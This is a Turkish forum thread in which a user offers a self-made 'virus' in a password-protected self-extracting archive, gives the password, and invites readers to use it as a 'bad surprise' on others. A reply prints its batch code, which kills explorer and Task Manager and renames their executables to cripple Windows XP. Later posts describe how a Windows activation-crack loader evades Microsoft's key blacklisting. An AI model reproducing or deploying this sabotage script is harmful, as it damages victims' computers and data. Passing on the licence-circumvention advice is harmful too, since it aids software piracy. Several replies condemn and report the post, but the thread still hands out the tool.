DeaRPC v1.1

DeaRPC v1.1 benim kendi yaptığım basit bir virüstür daha hiçbir antivirüs göremedi. istediklerinize kötü bir sürpriz yapabilirsiniz :) amacım kötülük vb birşey değil sadece bu alanlarda etkinlik kazanmak istiyorum. Dosya paylaşmak yasakmış ama pro bnim olduğu için hiç bir sıkıntı olmaz.

çalışma mantığı şu:
dosyayı açtıktan sonra bir şifre istiyecek. 18067754828
yükle dediğinizde o pc ölür yani format şart...
çok iyi bilgisayar bilenler çözümü bulur tabikii

böyle şeyler hiç hoş değil  virustotale rapor  edeceğim aynı zamanda ihbarweb e de  yollayacağım kimsenin kimseye şakada olsa böyle birşey yapması  hiç hoş değil nefret  edilecek bir durum  ayrıca bende deep freeze var son versiyon lisanslı  o yüzden bana bişe olmaz

yolladım  ihbarweb e  kötü sürpriz yapmak    kişinin onca emeğini  hiçe sayıp formata götürmek   kötü birşeydir

hele benim  gibi  o kadar oyun yükleyen birinin pc sinde deep  freeze  pasif  bırakmışken yani başka birşey yüklerken b programın  yüklenmesi  10 günlük geceli gündüzlü emeğin boşa gitmesi demektir

benimde dökümanlarım var ama  bilgi ve kendi pc sinde deneyim  yaşamak isteyenler için  ayrıca  senin gibi program yazıp  kötü sürpiz yapın   diye yayınlamıyorum

tamam hocam sakin ol bunu faydalı halede getirebilirsin; ufak bi ayarla oto ram boşaltma yapıyor

Alıntı: huseyinekrem  

tamam hocam sakin ol bunu faydalı halede getirebilirsin; ufak bi ayarla oto ram boşaltma yapı

tamam sakinim sadece  şundan siirlendim şu anda oyun yüklediğim için deep freeze pasif ve pc de 200 ün üstünde yeni nesil  oyun var   az kalsın programı indirip çalıştırıyordum  ve pc em çökecekti  :)
tam olarak ne yapıyor  ihbarı yolladım tühh ya  neyse   sonuç çıkmaz merak etme yani ceza  yemessin  :)  
zaten  korkutma amaçlı yolladım   yani  %100 garanti veriyorum ceza yemessin  rahat ol  :) bu gibi şeylere kulak asmıyorlar zamanında ben senin yaptığından çok daha büyük birşey yapmıştım  :)   ihbar edildim birşey çıkmadı evim  bile aranmadı  :)  %100 rahat ol yani relax  ayrıca pm den  neyi sildiğini nasıl çökerttiğimi  yazsan deep freeze aktifken bi denerim  :)

Güzel bir paylaşım.Arkadaş bir açık bulmuş ve bize göstermiş.Pidleri takip edersek kullanılan ve dahabitrçok açığı bulabiliriz.Bir ara pcye virtualbox yükleyip deniyim....
Not:Virustotal gibi sitelerin virusu görememesi dosyanın sifreli oluşundandır.Arkaplan işlemleri yaptığı için en azından bir antivirus şüpheli alarmı verecektir...

windows 7 de çalıştırdım   sadece explorer ı kapattı onuda açtım  sanırım programın boot dosyalarına zarar verip windows u açılmaz  hale getiriyor  :)  benim pc deki deep freeze güncel  olduğu için son versiyon  yani  
şu anda aktif zaten

iyide bu  açık sayılmazki arkadaş .bat dosyası yazmış  basit  tskill falan var    sadece explorer ı   yeniden adlandırıyor önce tskill komutu verip  sonrada taskmanager i yeniden adlandırıp  tskill komutu veriyor dosyayıda winrarın kendi kendine açılan arşiviyle   hazırlamış  
tskill explorer
tskill explorer
tskill explorer
rename C:\WINDOWS\explorer.exe PC.exe

tskill tskmgr
tskill tskmgr
tskill tskmgr
tskill tskmgr
tskill tskmgr
rename C:\WINDOWS\system32\taskmgr.exe deadpc.exe
rename C:\WINDOWS\ServicePackFiles\i386\taskmgr.exe kill.exe
ayrıca windows 7 ye işlemedi  ne taskmanager i etkisiz bırakabildi  nede explorer  ı silebildi

Bildiğimiz bat dosyasımı bu :DDDD
Ordaki dosyalara t.o. yapmadan hareket bile ettiremezsiniz arkadaş bunu bilmiyor herhalde :DDD
Ayrıca tamiri de basit.Kodları net kafede incledikten sonra ubuntu indir ve ismi değştirilen dosyalrı düzelt.
3-5 kere program ve proglamla bağlı dosyaları sonlandırmaya gerek yok.Bir sefer yeterli.
Bari @echo off verseydi de.Istemcide yapılanlar görünmeseydi...
Hacker dedik noob çıktı...
Not:Hakketten bat dosyasıymış :D

Alıntı: M.G.G  

Bildiğimiz bat dosyasımı bu :DDDD
Ordaki dosyalara t.o. yapmadan hareket bile ettiremezsiniz arkadaş bunu bilmiyor herhalde :DDD
Ayrıca tamiri de basit.Kodları net kafede incledikten sonra ubuntu indir ve ismi değştirilen dosyalrı düzelt.
3-5 kere program ve proglamla bağlı dosyaları sonlandırmaya gerek yok.Bir sefer yeterli.
Bari @echo off verseydi de.Istemcide yapılanlar görünmeseydi...
Hacker dedik noob çıktı...
Not:Hakketten bat dosyasıymış :

windows 7 de sadece explorer  sonlandırabiliyor taskmanager e dokunamıyor hemen explorer.exe yazarak açıyorsun zaten +  windows 7 de explorer  ve taskmanager in ismini dahi değiştiremiyor program  
:D
ya  bak google a  how to  delete system reserved  yaz   araştır  ben denedim 3-4 dos  komutuyla  sistem ayrıldıyı komple sildim    tabi  deep freeze aktifti  pc yi yeniden başlattım herşey eski haline döndü
bu arada by daz  duymuşsundur  windows loader i yapan kişi   veya grup  herneyse windows loader i sürekli güncelliyor  güncel loader ile hem tüm updateleri alıyon hem windows sınırsız kullanım oluyor  hemde  microsoft un sitesindeki doğrulamayı geçebiliyon süper ya  
loader in çalışma  mantığınıda çözdüm   adam windows 7 nin dosyalarını  kırıp  keylere  ulaşıyor   sonra bunları program yazarak birleştiriyor   loaderdan install dedin mi  o keylerden rastgele  kuruyor  microsoftta  doğrulamada  key karalisteye girmemişse  doğrulamayı geçiyor  microsoft karalisteye aldıkça adam  yine   windowsun dosyalarından key buluyor  keyleri birleştirip yeni sürüm diye yayınlıyor  
sürekli  key  buluyor adam yeni keyler    key sayısı o kadar fazlaki  çakışma ihtimali %1 adam  işi  çözmüş microsoft   adamın bulduğu tüm keyleri karalisteye alıyor  adam 24 saat sonra  yeni keyler  buluyor ve  programıuyla birleştirip  en sonda programın  kendi standartlarına  göre sürüm ve build  numarasını değiştiriyor nete  upload  ediyor  hemen tüm nete  yayılıyor  böylece  microsofta darbe indirilmiş oluyor  windows 8 desteği bile  gelmiş bu  versiyonda  inceledim release notlarını
burda  loader in karalisteye girmesinin gecikmesinin nedenide  adam  programın kodlarını  şifrelemiş  her seferindede  bu şifremeyi  değiştiriyor

Alıntı: liberty city  

bu arada by daz  duymuşsundur  windows loader i yapan kişi   veya grup  herneyse windows loader i sürekli güncelliyor  güncel loader ile hem tüm updateleri alıyon hem windows sınırsız kullanım oluyor  hemde  microsoft un sitesindeki doğrulamayı geçebiliyon süper ya  
loader in çalışma  mantığınıda çözdüm   adam windows 7 nin dosyalarını  kırıp  keylere  ulaşıyor   sonra bunları program yazarak birleştiriyor   loaderdan install dedin mi  o keylerden rastgele  kuruyor  microsoftta  doğrulamada  key karalisteye girmemişse  doğrulamayı geçiyor  microsoft karalisteye aldıkça adam  yine   windowsun dosyalarından key buluyor  keyleri birleştirip yeni sürüm diye yayınlıyor  
sürekli  key  buluyor adam yeni keyler    key sayısı o kadar fazlaki  çakışma ihtimali %1 adam  işi  çözmüş microsoft   adamın bulduğu tüm keyleri karalisteye alıyor  adam 24 saat sonra  yeni keyler  buluyor ve  programıuyla birleştirip  en sonda programın  kendi standartlarına  göre sürüm ve build  numarasını değiştiriyor nete  upload  ediyor  hemen tüm nete  yayılıyor  böylece  microsofta darbe indirilmiş oluyor  windows 8 desteği bile  gelmiş bu  versiyonda  inceledim release notlarını
burda  loader in karalisteye girmesinin gecikmesinin nedenide  adam  programın kodlarını  şifrelemiş  her seferindede  bu şifremeyi  değiş

Loaderler biraz farklı çalışır.Şifreleme olayı doğru ama o kısımdan değil.
Loaderler windowstaki şifre algoritmasını dlller yoluyla 2lik düzene farklı aktarır.Sonra da bir kaç rasgele harf ve rakam ile 2lik düzenden çıkartır.Microzsoft da bunu çakana kadar bedava kullanırsınız.Sonra bir yama yayınlayıp değştirilen dllnin birini orjinaliyle değiştirir ve oyunu bozar.
Aynı şunun gibi düşünün size 15 liralık fake iphone 4 satıyorlar boyutu rengi, tasarımı hatta apple logosu bile aynı.Ama telefonu açınca içinde sadece bir tane led ve kağıttan ekran olduğunu anlıyorsunuz.Loader de aynı işi görür Microsoft(Anlattığım hikayeye göre siz) cracklenmiş windowsun(fake iphone 4) dllsini yamayla değiştirine kadar(Telefonu açmak) bedava kullanıyorsunuz(satın alma anı)
En basit yöntem tarihi ileri sarıp format atıp etkinleştirmek sonra da tarihi geri almaktır beleş ve yasal çözüm.

XP DE deneyecek babayiğit varsa çıksın :D bn win7de denemedim ama xpnin anasını ağlatıyor bide reset atarsanız... :D

xp ye winrollback kur korumaya al  tüm hdd leri ondan sonra  dene bakalım :D

hocam bi kerede taş koyma yoluma be :)